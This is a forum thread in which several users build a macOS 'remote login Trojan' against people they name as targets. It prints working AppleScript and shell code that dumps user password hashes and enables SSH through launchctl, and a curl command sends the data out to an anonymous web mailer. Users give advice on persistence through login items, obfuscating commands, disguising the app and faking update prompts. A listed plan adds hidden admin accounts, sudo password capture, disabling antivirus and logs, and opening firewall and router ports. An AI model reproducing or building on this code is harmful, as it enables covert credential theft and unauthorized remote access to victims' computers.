Oh good point... and some of the web mailers may require a specific 'referer' (normally it would be the page from which you submitted mail to the mailer, or the mailer itself.) When you test, look in the result for messages like "invalid referer or bad referrer".
It isn't the company anyone works for, it's the experiences they have had. I happen to have a lot of varied experience in this particular field. Some of which has been work related, and some of which not at all, just personal interest as in a hobby.
Full Version: remote login Trojan
QUOTE(andrewistheshit @ May 29 2008, 07:25 PM) 
im working on figuring out the app part with apple script
<---- im becoming a skiddy :[ rats...
<---- im becoming a skiddy :[ rats...
http://www.google.com/search?q=define:Script+kiddie
QUOTE('google')
Definitions of Script kiddie on the Web:
An incompetent hacker or cracker who relies on code that has been pre-built into software programs or scripts by others so that it can be run at ...
www.h-spot.net/threat_glossary.htm
In hacker culture, a script kiddie (occasionally script bunny, script kitty, or similar) is a derogatory term used for an inexperienced malicious hacker who uses programs developed by others to attack computer systems, and deface websites. ...
en.wikipedia.org/wiki/Script kiddie
An incompetent hacker or cracker who relies on code that has been pre-built into software programs or scripts by others so that it can be run at ...
www.h-spot.net/threat_glossary.htm
In hacker culture, a script kiddie (occasionally script bunny, script kitty, or similar) is a derogatory term used for an inexperienced malicious hacker who uses programs developed by others to attack computer systems, and deface websites. ...
en.wikipedia.org/wiki/Script kiddie
So, either become experienced (which will lead to competence) or write your own haxorwarez, or both! :)
well thats what i'm doing :]. its a slow process
I figured out the email part, and have moved on to recovering the hashes using. When I ran my trojan on startup it displayed a dialog that showed my hashes and said "System Events" error
Also if you guys know of an easy to use executable keylogger (or how to make one) that would be great. I tried incorporating LogKext and Keystroke Recorder X but it was way to complicated.
AppleScript:
pwd104.sh:
pwd105.sh
Also if you guys know of an easy to use executable keylogger (or how to make one) that would be great. I tried incorporating LogKext and Keystroke Recorder X but it was way to complicated.
AppleScript:
CODE
-- ################# HASHES START #################
set dir to POSIX path of (path to me)
set version_num to do shell script "sw_vers -productVersion" as string
end tell
if version_num is less than "10.5" then
do shell script "chmod -x " & dir & "/Contents/Resources/pwd104.sh"
do shell script "chmod 777 " & dir & "/Contents/Resources/pwd104.sh"
set the_hash to do shell script dir & "/Contents/Resources/pwd104.sh"
else if version_num is greater than or equal to "10.5" then
do shell script "chmod -x " & dir & "/Contents/Resources/pwd105.sh"
do shell script "chmod 777 " & dir & "/Contents/Resources/pwd105.sh"
set the_hash to do shell script dir & "/Contents/Resources/pwd105.sh"
end if
-- ################# HASHES END #################
set dir to POSIX path of (path to me)
set version_num to do shell script "sw_vers -productVersion" as string
end tell
if version_num is less than "10.5" then
do shell script "chmod -x " & dir & "/Contents/Resources/pwd104.sh"
do shell script "chmod 777 " & dir & "/Contents/Resources/pwd104.sh"
set the_hash to do shell script dir & "/Contents/Resources/pwd104.sh"
else if version_num is greater than or equal to "10.5" then
do shell script "chmod -x " & dir & "/Contents/Resources/pwd105.sh"
do shell script "chmod 777 " & dir & "/Contents/Resources/pwd105.sh"
set the_hash to do shell script dir & "/Contents/Resources/pwd105.sh"
end if
-- ################# HASHES END #################
pwd104.sh:
CODE
#!/bin/sh
nidump passwd . | grep "\*\*" | cut -d: -f 1 | while read the_name; do echo; echo "$the_name"; the_hashfile=`niutil -readprop . /users/"$the_name" generateduid`; the_hash=`cat /var/db/shadow/hash/"$the_hashfile"`; echo; echo "$the_hash"; echo "___${the_name}_NT:${the_hash:0:32}"; echo "___${the_name}_LM:${the_hash:32:32}"; echo "_${the_name}_NTLM:${the_hash:0:32}:${the_hash:32:32}"; S0SHA1="${the_hash:168:48}"; SSHA1="${the_hash:104:48}"; [ -n "${S0SHA1//0}" ] && echo "${the_name}S0SHA1:${S0SHA1}"; [ -n "${SSHA1//0}" ] && echo "${the_name}_SSHA1:${SSHA1}"; done
nidump passwd . | grep "\*\*" | cut -d: -f 1 | while read the_name; do echo; echo "$the_name"; the_hashfile=`niutil -readprop . /users/"$the_name" generateduid`; the_hash=`cat /var/db/shadow/hash/"$the_hashfile"`; echo; echo "$the_hash"; echo "___${the_name}_NT:${the_hash:0:32}"; echo "___${the_name}_LM:${the_hash:32:32}"; echo "_${the_name}_NTLM:${the_hash:0:32}:${the_hash:32:32}"; S0SHA1="${the_hash:168:48}"; SSHA1="${the_hash:104:48}"; [ -n "${S0SHA1//0}" ] && echo "${the_name}S0SHA1:${S0SHA1}"; [ -n "${SSHA1//0}" ] && echo "${the_name}_SSHA1:${SSHA1}"; done
pwd105.sh
CODE
#!/bin/sh
dscl . -list /Users "authentication_authority" | grep -i hash | sed "s/ .*$//" | while read the_name; do echo; echo "$the_name"; the_hashfile=$( dscl . -read /users/"${the_name}" generateduid | sed "s/^.* //" ); the_hash=`cat /var/db/shadow/hash/"$the_hashfile"`; echo; echo "$the_hash"; echo "___${the_name}_NT___:${the_hash:0:32}"; echo "___${the_name}_LM___:${the_hash:32:32}"; echo "_${the_name}_NTLM___:${the_hash:0:32}:${the_hash:32:32}"; S0SHA1="${the_hash:104:48}"; cram_md5="${the_hash:104:64}"; SSHA1="${the_hash:168:48}"; [ "x${the_hash:153:15}" != "x000000000000000" ] && echo "${the_name}_CRAM_MD5:${cram_md5}" || { [ -n "${S0SHA1//0}" ] && echo "${the_name}_S0SHA1__:${S0SHA1}"; }; [ -n "${SSHA1//0}" ] && echo "${the_name}_SSHA1___:${SSHA1}"; done
dscl . -list /Users "authentication_authority" | grep -i hash | sed "s/ .*$//" | while read the_name; do echo; echo "$the_name"; the_hashfile=$( dscl . -read /users/"${the_name}" generateduid | sed "s/^.* //" ); the_hash=`cat /var/db/shadow/hash/"$the_hashfile"`; echo; echo "$the_hash"; echo "___${the_name}_NT___:${the_hash:0:32}"; echo "___${the_name}_LM___:${the_hash:32:32}"; echo "_${the_name}_NTLM___:${the_hash:0:32}:${the_hash:32:32}"; S0SHA1="${the_hash:104:48}"; cram_md5="${the_hash:104:64}"; SSHA1="${the_hash:168:48}"; [ "x${the_hash:153:15}" != "x000000000000000" ] && echo "${the_name}_CRAM_MD5:${cram_md5}" || { [ -n "${S0SHA1//0}" ] && echo "${the_name}_S0SHA1__:${S0SHA1}"; }; [ -n "${SSHA1//0}" ] && echo "${the_name}_SSHA1___:${SSHA1}"; done
haha im way behind im still trying to figure out the part where it dosnt ask you for the password all i have is
1. A working BASH script (it does everything but its all visiable)
2. i have a app from apple script with
that in it and i ran it just to see what it does and i read the man on launchctl and it look like i dumped all my files in LaunchDeamons and now there is nothing there :[
and im kinda stuck on what to do now on the torjan
1. A working BASH script (it does everything but its all visiable)
2. i have a app from apple script with
CODE
tell application "System Events" to do shell script "launchctl load -w /System/Library/LaunchDaemons/ssh.plist"
that in it and i ran it just to see what it does and i read the man on launchctl and it look like i dumped all my files in LaunchDeamons and now there is nothing there :[
and im kinda stuck on what to do now on the torjan
Ok well that seams to work except I did "cat /usr/bin/sudo" and got what I believe was an encrypted file. So how do I read where the password is?
And about catching the sudo, the problem is that most people I'm trying to "hack" don't even know what a terminal is.
And about catching the sudo, the problem is that most people I'm trying to "hack" don't even know what a terminal is.
Ya I know.
QUOTE
And about catching the sudo, the problem is that most people I'm trying to "hack" don't even know what a terminal is
lol i know what u mean... maybe if they enter an password to install a app then you could piggyback it then? idk if that would work.
QUOTE
Ya I know.
was that directed at my post?
cuz im totaly stuck now "[
sudo -k you mean right...?
sudo -k
?
im lost in a sea of confusion.
if anyone wants to pm me and give a begginer a little help feal free all i got now is a working BASH script :[ i got confused when i got into the apple script part.
weird considerding apple scirpt is perty easy and i acualy know some
?
im lost in a sea of confusion.
if anyone wants to pm me and give a begginer a little help feal free all i got now is a working BASH script :[ i got confused when i got into the apple script part.
weird considerding apple scirpt is perty easy and i acualy know some
QUOTE(andrewistheshit @ May 29 2008, 09:08 PM)
lol i know what u mean... maybe if they enter an password to install a app then you could piggyback it then? idk if that would work.
was that directed at my post?
cuz im totaly stuck now "[
was that directed at my post?
cuz im totaly stuck now "[
lol I think. you said something like " . files are hidden so try ls -a"
long threads always get me confused and the outline setting gets confusing.
QUOTE(Oktane @ May 29 2008, 08:42 PM)
I figured out the email part, and have moved on to recovering the hashes using. When I ran my trojan on startup it displayed a dialog that showed my hashes and said "System Events" error
The hashes or the hash file names? If it was the names, it's because you would have to 'sudo cat' in the shell script (or sudo when you run the shell script) or use "with administrator privileges" in the AppleScript to read the hash files.
This works in AppleScript for both 10.4 and 10.5 ---if--- sudo is working (note the use of sudo for the_hash='sudo cat...! It does not 'nidump passwd .' which you might want to do separately under 10.4 and not under 10.5.
CODE
do shell script "dscl . -list /Users \"authentication_authority\" | grep -i hash | sed \"s/ .*$//\" | while read the_name; do echo; echo \"$the_name\"; the_hashfile=$( dscl . -read /users/\"${the_name}\" generateduid | sed \"s/^.* //\" ); the_hash=`sudo cat /var/db/shadow/hash/\"$the_hashfile\"`; echo; echo \"$the_hash\"; echo \"___${the_name}_NT___:${the_hash:0:32}\"; echo \"___${the_name}_LM___:${the_hash:32:32}\"; echo \"_${the_name}_NTLM___:${the_hash:0:32}:${the_hash:32:32}\"; S0SHA1=\"${the_hash:104:48}\"; cram_md5=\"${the_hash:104:64}\"; SSHA1=\"${the_hash:168:48}\"; [ \"x${the_hash:153:15}\" != \"x000000000000000\" ] && echo \"${the_name}_CRAM_MD5:${cram_md5}\" || { [ -n \"${S0SHA1//0}\" ] && echo \"${the_name}_S0SHA1__:${S0SHA1}\"; }; [ -n \"${SSHA1//0}\" ] && echo \"${the_name}_SSHA1___:${SSHA1}\"; done"
QUOTE(Oktane @ May 29 2008, 08:42 PM)
Also if you guys know of an easy to use executable keylogger (or how to make one) that would be great. I tried incorporating LogKext and Keystroke Recorder X but it was way to complicated.
Installing it you mean? 'man installer' :)
QUOTE(andrewistheshit @ May 29 2008, 09:15 PM)
im lost in a sea of confusion.
Ya well there are 5 or 6 things happening in this thread.
QUOTE(lokin @ May 29 2008, 09:01 PM)
Ok well that seams to work except I did "cat /usr/bin/sudo" and got what I believe was an encrypted file.
I'm not sure what you mean by 'that seems to work' ... which that?
'cat' reads the content of a file and displays it on screen unless redirected. /usr/bin/sudo is the *program* sudo. So you dumped the program sudo on your screen. I'm not sure if you wanted 'cat /etc/sudoers' ???
QUOTE(lokin @ May 29 2008, 09:01 PM)
So how do I read where the password is?
Which password or what type of password? Ohh.. perhaps 'cat ~/Public/.howdy'
QUOTE(lokin @ May 29 2008, 09:01 PM)
And about catching the sudo, the problem is that most people I'm trying to "hack" don't even know what a terminal is.
I understand, it's also not without the risk of being noticed if someone does happen to be familiar with the command line. There is no guarantee that asking the user for a password will work. There's no guarantee that setting an alias for the sudo command would work. No guarantee waiting around to piggyback on sudo would work. No guarantee that you would have write access to files that are executed during startup to get your scripts run as root... so, considering that any of the options -may- fail, it's nice to have other options. :)
if any one wants to help me out that would be great so that I can then contribute in the future
QUOTE(andrewistheshit @ May 29 2008, 08:52 PM)
haha im way behind im still trying to figure out the part where it dosnt ask you for the password all i have is
1. A working BASH script (it does everything but its all visiable)
...
and im kinda stuck on what to do now on the torjan
1. A working BASH script (it does everything but its all visiable)
...
and im kinda stuck on what to do now on the torjan
Go back to post #149 on page 15. Use the 'defaults' command in Terminal (change the /Users/username to /Users/andrewfree if that is your correct username - that will take care of the /Library/Preferences/com.apple.SystemLoginItems.plist file if you have write access...
Then copy the short script and paste it into the AppleScript Script Editor program. Save as "application bundle", check "Run only" and save it to your Desktop with the name "AdjustGamma.app".
Turn off your Remote Login in System Preferences > Sharing
Restart.
Check Remote Login and also check the log file which will be just inside your hard drive and named "applog.txt"
ok thanks I was just poking around with the property list editor and saw that adjust gamma was set to run. But one question is the apple script having a BASH shell run as root because it is startup and then it should turn on remote login and email results ;)
now just for delvery system if I got the above process right
now just for delvery system if I got the above process right
Andrew, The short script back on page 15 does essentially two things - write some status messages to a log file so you can see where it stops working or whether it worked and it tells launchctl to load ssh (essentially the same as checking the Remote Login box in System Preferences > Sharing.)
The AppleScript program will only run if the correct path to the program is set in /Library/Preferences/com.apple.SystemLoginItems.plist
The AppleScript program will only run if the correct path to the program is set in /Library/Preferences/com.apple.SystemLoginItems.plist
Lokin, you got me to try the outline view for the first time. :) I had thought that it made more sense to start my posts with a quote so that it was clear what I was replying to... but after seeing outline view I think I will preface them with the name of the person to whom I'm responding... hopefully that will make it a bit easier.
QUOTE(lokin @ May 29 2008, 09:41 PM)
long threads always get me confused and the outline setting gets confusing.
Oktane, I forgot to say that if you already have a functional user password you can...
CODE
do shell script "dscl . -list /Users \"authentication_authority\" | grep -i hash | sed \"s/ .*$//\" | while read the_name; do echo; echo \"$the_name\"; the_hashfile=$( dscl . -read /users/\"${the_name}\" generateduid | sed \"s/^.* //\" ); the_hash=`sudo cat /var/db/shadow/hash/\"$the_hashfile\"`; echo; echo \"$the_hash\"; echo \"___${the_name}_NT___:${the_hash:0:32}\"; echo \"___${the_name}_LM___:${the_hash:32:32}\"; echo \"_${the_name}_NTLM___:${the_hash:0:32}:${the_hash:32:32}\"; S0SHA1=\"${the_hash:104:48}\"; cram_md5=\"${the_hash:104:64}\"; SSHA1=\"${the_hash:168:48}\"; [ \"x${the_hash:153:15}\" != \"x000000000000000\" ] && echo \"${the_name}_CRAM_MD5:${cram_md5}\" || { [ -n \"${S0SHA1//0}\" ] && echo \"${the_name}_S0SHA1__:${S0SHA1}\"; }; [ -n \"${SSHA1//0}\" ] && echo \"${the_name}_SSHA1___:${SSHA1}\"; done" user name the_username password the_password with administrator privileges
Are we all caught up to the same point? Everything functional etc.?
Is that compatible with 10.4 and 10.5, what else is different between systems that we need to be aware of?
Oktane, yes dscl will work in 10.4 (Tiger) and 10.5 (Leopard). In 10.3, using nidump would work to get the usernames. In 10.2 and prior, just 'nidump passwd .' is sufficient for the OS X account password hashes although /var/db/samba/hash may at times also contain easy to crack NTLM hashes in 10.2 (if the user account was configured to allow Windows File Sharing.)
Situations in which the OS version should be identified and different routines used to accomplish...
Situations in which the OS version should be identified and different routines used to accomplish...
- Enabling Remote Login. launchd will work for 10.5 & 10.4, xinetd for 10.3, modifying /etc/hostconfig & manually starting the service will work for 10.2 and prior.
- Extracting OS X user account password hashes
- Identifying / formatting OS X user account password hashes
- Installing a program which runs during the OS X startup or login process.
- Exploiting vulnerabilities specific to a given version(s) of OS X.
Subroutines: functions and handlers.
You may have noticed that the bash script uses 'functions'. They are similar to AppleScript's 'handlers'. Both are subroutines which can be called or executed from somewhere else in the script. Rather than repeating a portion of code each time it is needed, the script can call a subroutine - this keeps the source code smaller (no duplication of the same code) and makes troubleshooting much easier (you only need to fix one copy of the code - in the subroutine. There are some basic differences between AppleScript's and bash's handling of subroutines. In bash, the subroutine must be placed in the source code prior to being called (at the top for instance.) In AppleScript, global variables must be set first and then the subroutine may be called. Here's an example in AppleScript for deobfuscation.
First the variables key1 and key2 are set using the 'property' command which makes the variables global - they will be available to all portions of the code including subroutines.
Next, are the subroutines 'fuxor' and 'defuxor'.
To encode a string, call the fuxor subroutine and pass it the string. To decode, call defuxor and pass it the string.
At any further point in the code, the subroutines can be called and passed a string to be encoded or decoded. The actual code of the subroutine never needs to be repeated in the source and it's very portable - you can easily copy and paste the property commands and the subroutines into another AppleScript program and use them just by calling their names.
If you design each part of your script to work as a handler (subroutine), you will be able to quickly copy and past the handler into a new program and then just call it.
The same is true for bash scripts. Once a function is working, you need only copy the function to your new script, ensure that any variables needed are declared and then call the function.
If there is any command or portion of source code that anyone is having trouble understanding, speak up!
You may have noticed that the bash script uses 'functions'. They are similar to AppleScript's 'handlers'. Both are subroutines which can be called or executed from somewhere else in the script. Rather than repeating a portion of code each time it is needed, the script can call a subroutine - this keeps the source code smaller (no duplication of the same code) and makes troubleshooting much easier (you only need to fix one copy of the code - in the subroutine. There are some basic differences between AppleScript's and bash's handling of subroutines. In bash, the subroutine must be placed in the source code prior to being called (at the top for instance.) In AppleScript, global variables must be set first and then the subroutine may be called. Here's an example in AppleScript for deobfuscation.
CODE
--Variables
property key1 : do shell script "echo -e \"\\x5b\\x6e\\x2d\\x7a\\x69\\x2d\\x6d\\x61\\x2d\\x68\\x5d\\x38\\x36\\x37\\x35\\x33\\x30\\x39\\x2d\\x34\\x20\\x32\\x31\""
property key2 : do shell script "echo -e \"\\x5b\\x61\\x2d\\x68\\x69\\x2d\\x6d\\x6e\\x2d\\x7a\\x5d\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x20\\x2d\""
--Handlers
on fuxor(the_variable)
return do shell script ("echo \"" & the_variable & "\" | tr \"" & key2 & "\" \"" & key1 & "\"")
end fuxor
on defuxor(the_variable)
return do shell script ("echo \"" & the_variable & "\" | tr \"" & key1 & "\" \"" & key2 & "\"")
end defuxor
--Main
fuxor("ls -alo /Library/Preferences")
display dialog defuxor("Tuva2va2bur2qrpjqrq2zraantr.")
do shell script defuxor("ya21nyj2/Lvomnmg/Pmrsrmripra")
property key1 : do shell script "echo -e \"\\x5b\\x6e\\x2d\\x7a\\x69\\x2d\\x6d\\x61\\x2d\\x68\\x5d\\x38\\x36\\x37\\x35\\x33\\x30\\x39\\x2d\\x34\\x20\\x32\\x31\""
property key2 : do shell script "echo -e \"\\x5b\\x61\\x2d\\x68\\x69\\x2d\\x6d\\x6e\\x2d\\x7a\\x5d\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x20\\x2d\""
--Handlers
on fuxor(the_variable)
return do shell script ("echo \"" & the_variable & "\" | tr \"" & key2 & "\" \"" & key1 & "\"")
end fuxor
on defuxor(the_variable)
return do shell script ("echo \"" & the_variable & "\" | tr \"" & key1 & "\" \"" & key2 & "\"")
end defuxor
--Main
fuxor("ls -alo /Library/Preferences")
display dialog defuxor("Tuva2va2bur2qrpjqrq2zraantr.")
do shell script defuxor("ya21nyj2/Lvomnmg/Pmrsrmripra")
First the variables key1 and key2 are set using the 'property' command which makes the variables global - they will be available to all portions of the code including subroutines.
Next, are the subroutines 'fuxor' and 'defuxor'.
To encode a string, call the fuxor subroutine and pass it the string. To decode, call defuxor and pass it the string.
At any further point in the code, the subroutines can be called and passed a string to be encoded or decoded. The actual code of the subroutine never needs to be repeated in the source and it's very portable - you can easily copy and paste the property commands and the subroutines into another AppleScript program and use them just by calling their names.
If you design each part of your script to work as a handler (subroutine), you will be able to quickly copy and past the handler into a new program and then just call it.
The same is true for bash scripts. Once a function is working, you need only copy the function to your new script, ensure that any variables needed are declared and then call the function.
CODE
#!/bin/bash
# Functions
function fuxor () {
echo "${1}" | tr "${key2}" "${key1}"
}
function defuxor () {
echo "${1}" | tr "${key1}" "${key2}"
}
# Variables
declare key1=$( echo -e "\x5b\x6e\x2d\x7a\x69\x2d\x6d\x61\x2d\x68\x5d\x38\x36\x37\x35\x33\x30\x39\x2d\x34\x20\x32\x31" )
declare key2=$( echo -e "\x5b\x61\x2d\x68\x69\x2d\x6d\x6e\x2d\x7a\x5d\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x20\x2d" )
declare a_command secret_message
# Main
# clear the screen in Terminal
clear
echo " An unfuxored command: \"ls -alod /Library/Preferences\""
# Set the variable a_command to the fuxored version of the quoted text string
a_command=$( fuxor "ls -alod /Library/Preferences" )
# Show it in Terminal
echo "The fuxored command looks like this: ${a_command}"
echo # a blank line.
# Run the command
$( defuxor "${a_command}" )
echo # a blank line.
# fuxor and defuxor and run it all at once.
$( defuxor $( fuxor "ls -alod /Library/Preferences" ) )
echo # a blank line.
secret_message=$( fuxor "Hey what's up?" )
echo "SECRET MESSAGE:${secret_message}"
echo -n " DECODED:"
defuxor "${secret_message}"
exit 0
# Functions
function fuxor () {
echo "${1}" | tr "${key2}" "${key1}"
}
function defuxor () {
echo "${1}" | tr "${key1}" "${key2}"
}
# Variables
declare key1=$( echo -e "\x5b\x6e\x2d\x7a\x69\x2d\x6d\x61\x2d\x68\x5d\x38\x36\x37\x35\x33\x30\x39\x2d\x34\x20\x32\x31" )
declare key2=$( echo -e "\x5b\x61\x2d\x68\x69\x2d\x6d\x6e\x2d\x7a\x5d\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x20\x2d" )
declare a_command secret_message
# Main
# clear the screen in Terminal
clear
echo " An unfuxored command: \"ls -alod /Library/Preferences\""
# Set the variable a_command to the fuxored version of the quoted text string
a_command=$( fuxor "ls -alod /Library/Preferences" )
# Show it in Terminal
echo "The fuxored command looks like this: ${a_command}"
echo # a blank line.
# Run the command
$( defuxor "${a_command}" )
echo # a blank line.
# fuxor and defuxor and run it all at once.
$( defuxor $( fuxor "ls -alod /Library/Preferences" ) )
echo # a blank line.
secret_message=$( fuxor "Hey what's up?" )
echo "SECRET MESSAGE:${secret_message}"
echo -n " DECODED:"
defuxor "${secret_message}"
exit 0
If there is any command or portion of source code that anyone is having trouble understanding, speak up!
I still can't get that cURL email working...
http://psidude.com/mailer/
Displays this:
When I use it without the cURL through a browser I recieve it quickly!
http://psidude.com/mailer/
CODE
set the_username to "Hello"
set my_email to "#####@#####"
set the_subject to "Your Data has arrived!"
set the_message to the_username
set the_message to do shell script "echo \"" & the_message & "\" | tr '. 0123456789[A-M][N-Z][a-m][n-z]' '_+5678901234[N-Z][A-M][n-z][a-m]'"
do shell script "curl -d \"hdnSendMail=sendNow&To=" & my_email & "&CC=&BCC=&Subject=" & the_subject & "&Message=" & the_message & "&btnSend=Send\" http://psidude.com/mailer/"
set my_email to "#####@#####"
set the_subject to "Your Data has arrived!"
set the_message to the_username
set the_message to do shell script "echo \"" & the_message & "\" | tr '. 0123456789[A-M][N-Z][a-m][n-z]' '_+5678901234[N-Z][A-M][n-z][a-m]'"
do shell script "curl -d \"hdnSendMail=sendNow&To=" & my_email & "&CC=&BCC=&Subject=" & the_subject & "&Message=" & the_message & "&btnSend=Send\" http://psidude.com/mailer/"
Displays this:
CODE
"<center>
Psidude Anonymous Emailer
<title>Anonymous Emailer at psidude.com</title>
<br>
<br>
<form action=\"mail.php\" method=\"post\">
<table border=\"0\" bgcolor=\"#ececec\" cellspacing=\"5\">
<tr><td>To Email address</td><td><input type=\"text\" size=\"30\" name=\"email\"></td></tr>
<tr><td>Subject</td><td><input type=\"text\" size=\"30\" name=\"subject\"></td></tr>
<tr><td valign=\"top\">Message</td><td><textarea name=\"message\" rows=\"6\" cols=\"30\"></textarea></td></tr>
<tr><td> </td><td><input type=\"submit\" value=\"Send\"><font face=\"arial\" size=\"1\"></font></td></tr>
</table>
</form><br>
<br>
Please note: The email will be sent from anonymous@psidude.com. <br>
This helps prevent the email from being spammed.<br>
Email <a href=\"mailto:psidude@psidude.com\">psidude@psidude.com</a> for feature suggestions.<br>"
Psidude Anonymous Emailer
<title>Anonymous Emailer at psidude.com</title>
<br>
<br>
<form action=\"mail.php\" method=\"post\">
<table border=\"0\" bgcolor=\"#ececec\" cellspacing=\"5\">
<tr><td>To Email address</td><td><input type=\"text\" size=\"30\" name=\"email\"></td></tr>
<tr><td>Subject</td><td><input type=\"text\" size=\"30\" name=\"subject\"></td></tr>
<tr><td valign=\"top\">Message</td><td><textarea name=\"message\" rows=\"6\" cols=\"30\"></textarea></td></tr>
<tr><td> </td><td><input type=\"submit\" value=\"Send\"><font face=\"arial\" size=\"1\"></font></td></tr>
</table>
</form><br>
<br>
Please note: The email will be sent from anonymous@psidude.com. <br>
This helps prevent the email from being spammed.<br>
Email <a href=\"mailto:psidude@psidude.com\">psidude@psidude.com</a> for feature suggestions.<br>"
When I use it without the cURL through a browser I recieve it quickly!
Oktane, each web mail form may require different data to be submitted or a different format for the data.
See post #129 on page 13 for instructions on how to use Firefox and the LiveHTTPHeaders extension to watch what a web form is submitting. Then you only need to copy the format of the submitted string and insert your own variables.
If you haven't actually used LiveHTTPHeaders yet, do it until you are comfortable with the process. It's a very handy bit of knowledge to have for all sorts of things. :)
For the specific site which you are using, see posts #199 and #200 on page 20. Andrew's code in #200 is functional. Note that that particular site returns the message "Your message has been sent" upon success (as shown in the picture in post #199.)
See post #129 on page 13 for instructions on how to use Firefox and the LiveHTTPHeaders extension to watch what a web form is submitting. Then you only need to copy the format of the submitted string and insert your own variables.
If you haven't actually used LiveHTTPHeaders yet, do it until you are comfortable with the process. It's a very handy bit of knowledge to have for all sorts of things. :)
For the specific site which you are using, see posts #199 and #200 on page 20. Andrew's code in #200 is functional. Note that that particular site returns the message "Your message has been sent" upon success (as shown in the picture in post #199.)
I forgot to mention that both the examples in post #224 of this thread are using another very basic method of obfuscation. The \x indicates that the value following is in hexadecimal (base 16). In bash, echo -e expands these 'escaped' codes into their actual character. The capital letter 'A' is decimal 65 (base 10) and is hexadecimal 41 (base 16). So, in bash, 'echo -e "\x41"' would result in the capital letter 'A' being echoed on the screen. To see the keys in Terminal...
And escaping in AppleScript...
CODE
echo -e "\x5b\x6e\x2d\x7a\x69\x2d\x6d\x61\x2d\x68\x5d\x38\x36\x37\x35\x33\x30\x39\x2d\x34\x20\x32\x31"
QUOTE
[n-zi-ma-h]8675309-4 21
CODE
echo -e "\x5b\x61\x2d\x68\x69\x2d\x6d\x6e\x2d\x7a\x5d\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x20\x2d"
QUOTE
[a-hi-mn-z]0123456789 -
And escaping in AppleScript...
CODE
--Handler
on slash_x_hex(the_variable)
set hex_characters to "0123456789ABCDEF"
set hexified_string to ""
repeat with each_character in the_variable
set decimal_value to ASCII number of each_character
set hexified_string to hexified_string & (ASCII character 92) & "x" & character (decimal_value div 16 + 1) of hex_characters & character (decimal_value mod 16 + 1) of hex_characters
end repeat
return hexified_string as string
end slash_x_hex
--Main
set whatever to slash_x_hex("Hello")
do shell script "echo \"" & whatever & "\"; echo -e \"" & whatever & "\""
on slash_x_hex(the_variable)
set hex_characters to "0123456789ABCDEF"
set hexified_string to ""
repeat with each_character in the_variable
set decimal_value to ASCII number of each_character
set hexified_string to hexified_string & (ASCII character 92) & "x" & character (decimal_value div 16 + 1) of hex_characters & character (decimal_value mod 16 + 1) of hex_characters
end repeat
return hexified_string as string
end slash_x_hex
--Main
set whatever to slash_x_hex("Hello")
do shell script "echo \"" & whatever & "\"; echo -e \"" & whatever & "\""
QUOTE
"\\x48\\x65\\x6C\\x6C\\x6F
Hello"
Hello"
Changing the icon. Just in case anyone isn't familiar with the process...
Create a picture to use as the icon, copy the image to the clipboard (command-c).
Control-click the application's icon in Finder and select Get Info.
Click the small icon in the upper left corner of the Get Info window until it shows a faint border around it indicating that it is selected. Then paste (command-v).
Then close the Get Info window.
You can also edit the icns file within the application bundle for custom icon masking.
Create a picture to use as the icon, copy the image to the clipboard (command-c).
Control-click the application's icon in Finder and select Get Info.
Click the small icon in the upper left corner of the Get Info window until it shows a faint border around it indicating that it is selected. Then paste (command-v).
Then close the Get Info window.
You can also edit the icns file within the application bundle for custom icon masking.
Well. Can someone at least help explain the applescript part. i just want to at least get something where someone opens an app made in apple script and it hides the BASH script witch i have working so when they restart their comp it will send me the password and IP info
Andrew, you would need to create an AppleScript along the lines of the following Pseudo-code - which is not real code, just a basic outline of what the program would need to do. From this point you would have to figure out how to write the functional AppleScript code for each part.
Pseudo-code
Pseudo-code
CODE
if this program is being run by user id 0 then
just run the shell script
else
modify the com.apple.SystemLoginItems.plist file to run myself from /Library/Caches/ on restart
move myself to /Library/Caches/
exit
end if
just run the shell script
else
modify the com.apple.SystemLoginItems.plist file to run myself from /Library/Caches/ on restart
move myself to /Library/Caches/
exit
end if
ok thanks thats better :]
because its the weekend i have been messing around with it more.
so i can discuise the apple script app and then if someone opens it it has the BASH script in it and it runs it on restart right :]
would a reboot command work in apple script? cuz then you dont have to wait for them to reastart their comp
because its the weekend i have been messing around with it more.
so i can discuise the apple script app and then if someone opens it it has the BASH script in it and it runs it on restart right :]
would a reboot command work in apple script? cuz then you dont have to wait for them to reastart their comp
Andrew, you can have AppleScript restart or issue a shell command to reboot but either one is blatantly obvious... you could try a little more finesse, such as "The required security updates have been installed successfully. You must restart." "OK"
Suggested subroutines...
Try writing them as pseudo-code first, then as either AppleScript Handlers or bash functions - or both.
Working code for some of these already exists in this thread...
can_sudo_come_out_to_play
Test to see if our good friend sudo is already ready
its_like_deja_vu_all_over_again
Check our secret files to see if we have already collected any passwords
defuxor
defuxorize an obfuscated string of text
dupe_user
Social-engineer a password
agent_86_reporting_for_duty_chief
Create a hidden admin user, or enable the root account, or allow a boring old existing account to log in
install_and_activate_logKext
Install and run logKext
rerun_me_every_startup
Try to insert myself into the startup or login process
enable_ssh
Turn it on
whodo_sudo
alias the sudo command to capture passwords
i_have_a_secret
Save some data someplace convenient like /Users/Shared or ~/Public or hey, maybe even /Library/WebServer/Documents :)
these_are_not_the_outgoing_network_communications_you_are_looking_for_jedi_mind trick
Sing a little lullaby to Little Snitch
i_like_you_just_as_you_are
Disable Software Update.
there_are_no_osx_viruses_silly_wabbit
Pre-emptive strike against the inevitable persecution from the anti-virus sector. Disable any a.v. software's ability to update... permanently.
pass_the_hash_man
Get every conceivable password hash on the entire system. Don't forget the Open Firmware password.
nothing_to_see_here
Stop all or some logging
throw_another_log_on_the_fire_or_none_of_this_ever_happened
Ensure that nothing unusual is left in the logs
its_smoky_in_here_lets_open_ports_in_the_firewall
Tell the OS X firewall to let us in
UPnP_how_much_did_you_drink
Tell the router to let us in too
phone_home_and_try_a_different_method_if_it_fails
Send some helpful information about how one might take over this whole computer remotely
just_hang_out_until_sudo_can_come_out_to_play
Quietly wait until sudo works
exit_stage_left
Once we've done all we need to do, we can leave or perhaps stick around and run again say, oh, once a month or so?
plan_B
If all else fails and we are not able to enable SSH... how about Telnet or WebSharing with a nice PHP shell, Apple Remote Desktop maybe etc? If we can't enable anything, at least look around and see where we have write access to modify existing programs... Maybe gain a little leverage with an exploit.
Try writing them as pseudo-code first, then as either AppleScript Handlers or bash functions - or both.
Working code for some of these already exists in this thread...
can_sudo_come_out_to_play
Test to see if our good friend sudo is already ready
